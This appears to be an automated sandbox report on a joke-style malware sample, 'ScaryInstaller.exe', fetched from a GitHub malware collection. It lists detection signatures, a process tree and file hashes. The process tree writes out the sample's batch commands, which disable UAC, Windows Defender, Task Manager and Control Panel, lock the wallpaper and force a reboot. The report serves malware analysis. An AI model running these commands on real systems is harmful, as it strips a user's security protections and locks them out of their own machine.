Analysis

  • max time kernel
    151s
  • max time network
    161s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win11-20240802-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    23-08-2024 22:32

Errors

Reason
Machine shutdown

General

  • Target

    https://github.com/pankoza2-pl/malwaredatabase-old

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Disables Task Manager via registry modification
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

    When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 20 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 3 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • NTFS ADS 2 IoCs
  • Runs net.exe
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 14 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/pankoza2-pl/malwaredatabase-old
    1⤵
    • Enumerates system info in registry
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3192
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb03e23cb8,0x7ffb03e23cc8,0x7ffb03e23cd8
      2⤵
      PID:340
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1896 /prefetch:2
      2⤵
      PID:464
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 /prefetch:3
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:3188
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2620 /prefetch:8
      2⤵
      PID:2144
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
      2⤵
      PID:1488
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
      2⤵
      PID:2380
    • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:8
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:1448
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4068 /prefetch:1
      2⤵
      PID:3400
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4708 /prefetch:1
      2⤵
      PID:3424
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4112 /prefetch:1
      2⤵
      PID:2968
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4900 /prefetch:1
      2⤵
      PID:5044
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5772 /prefetch:8
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:1892
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4680 /prefetch:1
      2⤵
      PID:1956
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6128 /prefetch:8
      2⤵
      PID:3432
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6168 /prefetch:8
      2⤵
      • Subvert Trust Controls: Mark-of-the-Web Bypass
      • NTFS ADS
      • Suspicious behavior: EnumeratesProcesses
      PID:620
    • C:\Users\Admin\Downloads\ScaryInstaller.exe
      "C:\Users\Admin\Downloads\ScaryInstaller.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:352
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\61EC.tmp\creep.cmd" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies registry class
        PID:4004
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im explorer.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4640
        • C:\Users\Admin\AppData\Local\Temp\61EC.tmp\CreepScreen.exe
          CreepScreen.exe
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of SetWindowsHookEx
          PID:1636
        • C:\Windows\SysWOW64\timeout.exe
          timeout 5 /nobreak
          4⤵
          • System Location Discovery: System Language Discovery
          • Delays execution with timeout.exe
          PID:708
        • C:\Users\Admin\AppData\Local\Temp\61EC.tmp\melter.exe
          melter.exe
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:252
        • C:\Windows\SysWOW64\timeout.exe
          timeout 10 /nobreak
          4⤵
          • System Location Discovery: System Language Discovery
          • Delays execution with timeout.exe
          PID:2528
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im CreepScreen.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3432
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im melter.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1268
        • C:\Program Files\VideoLAN\VLC\vlc.exe
          "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\61EC.tmp\scarr.mp4"
          4⤵
          • Suspicious behavior: AddClipboardFormatListener
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          PID:832
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f
          4⤵
          • Sets desktop wallpaper using registry
          • System Location Discovery: System Language Discovery
          PID:2456
        • C:\Windows\SysWOW64\rundll32.exe
          RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4560
        • C:\Windows\SysWOW64\reg.exe
          reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:4600
        • C:\Windows\SysWOW64\reg.exe
          reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • UAC bypass
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:656
        • C:\Windows\SysWOW64\reg.exe
          Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3080
        • C:\Windows\SysWOW64\reg.exe
          REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:2372
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3252
        • C:\Windows\SysWOW64\net.exe
          net user Admin /fullname:"IT'S TOO LATE!!!"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4412
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 user Admin /fullname:"IT'S TOO LATE!!!"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4516
        • C:\Windows\SysWOW64\timeout.exe
          timeout 8 /nobreak
          4⤵
          • System Location Discovery: System Language Discovery
          • Delays execution with timeout.exe
          PID:3320
        • C:\Windows\SysWOW64\shutdown.exe
          shutdown /r /t 5 /c "I CATCH YOU AND EAT YOUR FACE!!!"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:3712
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1848,16356703317395487071,17546934758923476537,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5960 /prefetch:2
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:3688
  • C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
    1⤵
    PID:2932
  • C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
    1⤵
    PID:1872
  • C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x00000000000004D4 0x00000000000004D0
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3784
  • C:\Windows\System32\PickerHost.exe
    C:\Windows\System32\PickerHost.exe -Embedding
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:896
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x4 /state0:0xa39cc855 /state1:0x41c64e6d
    1⤵
    • Modifies data under HKEY_USERS
    • Suspicious use of SetWindowsHookEx
    PID:1940

Network

MITRE ATT&CK Enterprise v15

                            Downloads

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                              Filesize

                              152B

                              MD5

                              70e969d4a2b40aef8eb0736379c0bcfb

                              SHA1

                              608c4fdf0e6b820eed23b793884e11210b32be58

                              SHA256

                              82e6cd647225c2781d32207ca56e1bf5e85dddabdfdf67a469c6e8910062975c

                              SHA512

                              e38f13e75d7a74400b1c21be8c5d8045c366078c4bfd7a25de86a872a22db8b383484c4f044d433f557ba3f181670398eeb7322fb6946a3bfff03875576b596d

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                              Filesize

                              152B

                              MD5

                              fc36221d3cc9a4657faeb51e3ea7023a

                              SHA1

                              22e3f8e68b2dd3992d544f8ca57c48c6878f77f9

                              SHA256

                              f393d5cc1a1b59d1bf0f19ade21515652b60bdea4b2d11780b904eb90fdd7b4b

                              SHA512

                              1d831b911b8e6970f3c829d7aed3c7d0faeb3f986fa029c8db8e2b2ced40898ad96b26311e620300ecd6d5a71f444582052b9ae11c4231224010096105bdb117

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                              Filesize

                              2KB

                              MD5

                              0189b12160bfb5d4cf817a3bb0a415d7

                              SHA1

                              03ac35ea0bc9089d320e972eb148c2fa80da811a

                              SHA256

                              fdcecd4977cc68071404063bb31000c770337b2896d50625dddc81f3f727a580

                              SHA512

                              c52e6fc8ca012fb2c14d02a0cdbec271ef3910583ff63311cbf89bd19c8c6faacb08926cd2f25f3f00b4d1d47a204d5d26539fe0896326ee1ec1d3a449a2d2a0

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                              Filesize

                              496B

                              MD5

                              30322550d9f9c54f345ea1c71f3b2e8f

                              SHA1

                              b5a3cff2995147279c2bbed7c03b2280ecb286e5

                              SHA256

                              4e7798d8476361378f8fbfb0442db63c7f6bf7e1830d50808bfdb8a58700d8f9

                              SHA512

                              261d1f5bc9c8a369f815eb846c252f54681f70862153bd49959411450870207b3ee240cc9016533c27401922527d561cc1ea7bb23708e4a257f071d010cf55ef

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                              Filesize

                              5KB

                              MD5

                              7be4d708c39f64a4064702faece3b745

                              SHA1

                              7c56df7a8130161bab9797fc66343f2bb7070cb4

                              SHA256

                              1702bef59efad48b34c3dd3726d926eebac4e60d8c4bff9da68da8d12c8a4175

                              SHA512

                              7b7f511cce53b6a6dedfa5136a48aca321fcb88cfee73e079bea85b94d8a06587af8f823729f10071145a61d57dddc1dd7459071668b39528323de1850548629

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                              Filesize

                              5KB

                              MD5

                              929adeefd6d0beba762f57e5e2f14ebf

                              SHA1

                              0f6fa337be0c53bf19a116264c6813a2b9f4b469

                              SHA256

                              fbc70bd4bda225f89f56a1208b51300c3ed9ef63c0eb05f2d250cf12fa117e91

                              SHA512

                              c516e333b1083bf36aeda8fddb3ce9d292c9b3f8667b219bb2eb2613b35722140e0dca71d0c116e1490235696a21a4e735e19ff590cfd5ce4fb742fcec11768a

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                              Filesize

                              5KB

                              MD5

                              dff6af21563d5ad2709aea894622efb0

                              SHA1

                              6b3fadd073217ec7986f622e38c872733cbcf415

                              SHA256

                              b13941caa3dae98c9988af179ee0067efa9b3406b709abd07194ed498b2ea76d

                              SHA512

                              32c57f7b8de9d03065d99c53952085d324f63955b0fb2b6c494394e6b619002c8f419511e616c8ceeae601c5aa7dc935d0a12ee89e88fd095b576ad380d93cca

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                              Filesize

                              5KB

                              MD5

                              86597e1962b9ea3980eb0747b04e5664

                              SHA1

                              4b8a9092bb93d441044cf0a4fd48b71ddde3ebe4

                              SHA256

                              84c7d8025b256358ce13d60c5446c773a605211a50e7c04a6d2387eaf64a582a

                              SHA512

                              c025a694b455cf7cca46269a4282188bd695679abb48573beb5002da116528f207065eb558d962b4414650f76edcfc8cdd5bca6deec2ae83128e4fc00e61a4b9

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                              Filesize

                              25KB

                              MD5

                              8c0d6616af07f61a695d23555f03afb5

                              SHA1

                              4d920d7f35be99217c86ea4dc2396a55e960a537

                              SHA256

                              ecc17c289b6a0f4fe10cae7e9eed2413279d3d4354d82fcc9bc672b7bd7493aa

                              SHA512

                              f903fe7977d14cc2d021bbf54f103421d0500cbf7b7f3cfd4ba93ae56af294307ec1b7d82c93d1fb530bb132ef4d009aa244ce2a60c23d7748b5ca08e4c7a2d0

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                              Filesize

                              874B

                              MD5

                              f336f8a39568d18123d2994d96a2eb41

                              SHA1

                              5846457d93d19d837e0b35a61e9f917215a366d9

                              SHA256

                              ddc41edb1416d0f7773cfc998a34042c5ca7117e9e4eea0ef98442e27f46f1f0

                              SHA512

                              4743163ffc5acc771d683f08f4476876853ddc46f47402d7c7c543ebd9d0a315e23a60a4777157d7daa3dc0376b5e12ff127755d66f884b1d466958b60bf2873

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                              Filesize

                              1KB

                              MD5

                              248203ea708a830701c19b699e83d654

                              SHA1

                              9bb1c10a8c43b17cc0eb59625dfa90cc3f8eb915

                              SHA256

                              886eeb486b61e33ba9b6bb1a34712efb27f118f7539c46b7510a4d62e35e6587

                              SHA512

                              9cac1c21da512bfbb191ad87d689c620e007f1b35927b89ec93026a3a17de2cd81b7f67a8112d98f26ebaa7046500d41110d8eb4ef519950a5feb70defebb42d

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                              Filesize

                              874B

                              MD5

                              cdbc52dc723f5fcb79a910cbf628df0b

                              SHA1

                              1b8e283ffea377b4e32c087d50ab220e934ffefe

                              SHA256

                              ea6ea0d904cfd880ee4d66a872cd4662e8e487dcd9f1cbf0a6a4d9185eb921f9

                              SHA512

                              a110be4133ab57cf5a801d168636fc2a746c1d46cb01c2e384eab37cd9bb45c0d5cc9e5044a5f3af04f7fdf6c21c8c69b4c0eb2226c7a774db23fdefbdda3a97

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                              Filesize

                              874B

                              MD5

                              53e5499039f5b3d0033cab8015e1e2ef

                              SHA1

                              965feb501b36a4a199eca0cb6ee8c4096f678cd8

                              SHA256

                              ec5cbe6d2cb1c419d39dd85bcfd021fed5d875f2cfe641c36b0557d874ab5e56

                              SHA512

                              2c9a03c3921781e551ef8cfc7aa99fe34a96442284ba4fc04cf0a7d4ffa40114c37063e19d8680fd5ab01836c8b5752fc8ba8c1b75a1f4ad3f677f2128968f53

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57eabe.TMP

                              Filesize

                              874B

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                              Filesize

                              16B

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                              Filesize

                              11KB

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                              Filesize

                              10KB

                            • C:\Users\Admin\AppData\Local\Temp\61EC.tmp\CreepScreen.exe

                              Filesize

                              128KB

                            • C:\Users\Admin\AppData\Local\Temp\61EC.tmp\bg.bmp

                              Filesize

                              5.9MB

                            • C:\Users\Admin\AppData\Local\Temp\61EC.tmp\creep.cmd

                              Filesize

                              1KB

                            • C:\Users\Admin\AppData\Local\Temp\61EC.tmp\melter.exe

                              Filesize

                              2KB

                            • C:\Users\Admin\AppData\Local\Temp\61EC.tmp\mover.exe

                              Filesize

                              548KB

                            • C:\Users\Admin\AppData\Local\Temp\61EC.tmp\scarr.mp4

                              Filesize

                              19.0MB

                            • C:\Users\Admin\Downloads\ScaryInstaller.exe:Zone.Identifier

                              Filesize

                              26B

                            • C:\Users\Admin\Downloads\Unconfirmed 253152.crdownload

                              Filesize

                              21.5MB

                            • memory/352-423-0x0000000000400000-0x0000000001DFD000-memory.dmp

                              Filesize

                              26.0MB

                            • memory/352-404-0x0000000000400000-0x0000000001DFD000-memory.dmp

                              Filesize

                              26.0MB

                            • memory/352-369-0x0000000000400000-0x0000000001DFD000-memory.dmp

                              Filesize

                              26.0MB

                            • memory/832-457-0x00007FFAFF340000-0x00007FFAFF351000-memory.dmp

                              Filesize

                              68KB

                            • memory/832-488-0x00000215BF920000-0x00000215C09D0000-memory.dmp

                              Filesize

                              16.7MB

                            • memory/832-433-0x00007FF6511B0000-0x00007FF6512A8000-memory.dmp

                              Filesize

                              992KB

                            • memory/832-435-0x00007FFAF74F0000-0x00007FFAF77A6000-memory.dmp

                              Filesize

                              2.7MB

                            • memory/832-443-0x00007FFAF6C30000-0x00007FFAF6E3B000-memory.dmp

                              Filesize

                              2.0MB

                            • memory/832-439-0x00007FFB00560000-0x00007FFB00577000-memory.dmp

                              Filesize

                              92KB

                            • memory/832-438-0x00007FFB03E50000-0x00007FFB03E61000-memory.dmp

                              Filesize

                              68KB

                            • memory/832-437-0x00007FFB05030000-0x00007FFB05047000-memory.dmp

                              Filesize

                              92KB

                            • memory/832-436-0x00007FFB09860000-0x00007FFB09878000-memory.dmp

                              Filesize

                              96KB

                            • memory/832-442-0x00007FFB00500000-0x00007FFB00511000-memory.dmp

                              Filesize

                              68KB

                            • memory/832-441-0x00007FFB00520000-0x00007FFB0053D000-memory.dmp

                              Filesize

                              116KB

                            • memory/832-458-0x00007FFAF7B40000-0x00007FFAF7B97000-memory.dmp

                              Filesize

                              348KB

                            • memory/832-440-0x00007FFB00540000-0x00007FFB00551000-memory.dmp

                              Filesize

                              68KB

                            • memory/832-434-0x00007FFB03640000-0x00007FFB03674000-memory.dmp

                              Filesize

                              208KB

                            • memory/832-449-0x00007FFB00100000-0x00007FFB00111000-memory.dmp

                              Filesize

                              68KB

                            • memory/832-444-0x00000215BF920000-0x00000215C09D0000-memory.dmp

                              Filesize

                              16.7MB

                            • memory/832-454-0x00007FFAFC620000-0x00007FFAFC650000-memory.dmp

                              Filesize

                              192KB

                            • memory/832-453-0x00007FFAFF390000-0x00007FFAFF3A8000-memory.dmp

                              Filesize

                              96KB

                            • memory/832-452-0x00007FFAFF3B0000-0x00007FFAFF3C1000-memory.dmp

                              Filesize

                              68KB

                            • memory/832-451-0x00007FFAFF3D0000-0x00007FFAFF3EB000-memory.dmp

                              Filesize

                              108KB

                            • memory/832-450-0x00007FFAFF3F0000-0x00007FFAFF401000-memory.dmp

                              Filesize

                              68KB

                            • memory/832-455-0x00007FFAFC2E0000-0x00007FFAFC347000-memory.dmp

                              Filesize

                              412KB

                            • memory/832-448-0x00007FFB00120000-0x00007FFB00131000-memory.dmp

                              Filesize

                              68KB

                            • memory/832-447-0x00007FFB004E0000-0x00007FFB004F8000-memory.dmp

                              Filesize

                              96KB

                            • memory/832-446-0x00007FFB002A0000-0x00007FFB002C1000-memory.dmp

                              Filesize

                              132KB

                            • memory/832-445-0x00007FFAFF410000-0x00007FFAFF451000-memory.dmp

                              Filesize

                              260KB

                            • memory/832-456-0x00007FFAF8A10000-0x00007FFAF8A8C000-memory.dmp

                              Filesize

                              496KB